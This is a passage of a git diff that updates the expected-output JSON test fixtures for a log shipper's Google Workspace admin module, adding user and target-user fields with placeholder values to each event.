+ "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3385,7 +3586,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3435,7 +3639,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3486,7 +3693,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3536,7 +3746,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3585,7 +3798,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3634,7 +3850,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3683,7 +3902,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3732,7 +3954,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3782,7 +4007,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3833,7 +4061,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3883,7 +4114,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3933,7 +4167,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3983,7 +4220,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4033,7 +4273,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4083,7 +4326,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4134,7 +4380,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4184,7 +4433,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4232,7 +4484,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4281,6 +4536,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json index 5d748bc3990f..86bbb3cbcbb6 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -102,7 +105,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -155,7 +161,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -212,7 +224,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -265,7 +280,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -318,7 +336,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -371,7 +392,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -421,7 +445,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -471,6 +498,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json index d322acefbf96..d9c9e452f409 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json @@ -49,7 +49,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -101,7 +104,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -153,7 +159,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -202,7 +211,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -256,7 +268,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -310,7 +330,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -366,7 +394,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -422,7 +458,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -478,7 +522,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -529,7 +581,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -578,7 +633,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -631,7 +689,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -686,7 +747,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -740,6 +804,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json index 9a6738eb30b0..c4dd9cdd54cc 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json @@ -48,7 +48,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -99,7 +102,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -151,7 +157,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -202,7 +214,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -255,7 +270,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -306,7 +327,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -358,7 +382,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -410,6 +440,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json index 436ec466cf4c..099e46ceb466 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json @@ -52,7 +52,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -107,7 +113,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -158,7 +170,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -207,7 +222,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -257,7 +275,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -307,7 +328,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -357,7 +381,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -407,7 +434,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -462,7 +492,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -512,7 +545,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -564,7 +600,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -620,7 +659,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -672,7 +714,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -725,7 +770,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -778,7 +829,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -831,7 +888,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -884,7 +947,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -938,7 +1007,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -988,7 +1060,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1039,7 +1114,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1090,7 +1168,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1141,7 +1222,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1192,7 +1276,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1243,7 +1330,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1291,7 +1381,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1339,7 +1432,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1387,7 +1483,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1435,7 +1534,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1488,7 +1590,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1541,7 +1649,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1594,6 +1708,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json index cb63268bf24f..efb0d4fefd70 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json @@ -48,7 +48,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -100,7 +103,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -151,7 +157,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -204,7 +213,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -253,7 +265,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -302,7 +317,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -351,7 +369,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -400,7 +421,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -449,7 +473,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -500,7 +527,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -549,7 +579,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -598,7 +631,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -647,7 +683,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -697,7 +736,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -747,7 +789,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -796,7 +841,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -851,6 +899,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json index d3e6ddbea996..38b52a4fde71 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json @@ -49,7 +49,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -100,7 +103,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -151,7 +157,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -205,7 +214,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -257,7 +269,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -309,7 +324,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -359,7 +377,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -414,7 +435,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -469,7 +493,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -524,7 +551,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -579,7 +609,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -633,7 +666,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -682,7 +718,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -732,7 +771,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -785,7 +827,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -834,7 +879,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -883,7 +931,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -938,7 +989,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -995,7 +1049,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1047,7 +1104,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1102,7 +1162,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1155,7 +1218,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1206,7 +1272,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1256,6 +1325,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json index aa6e0b98b67f..23436a2de5fc 100644 --- 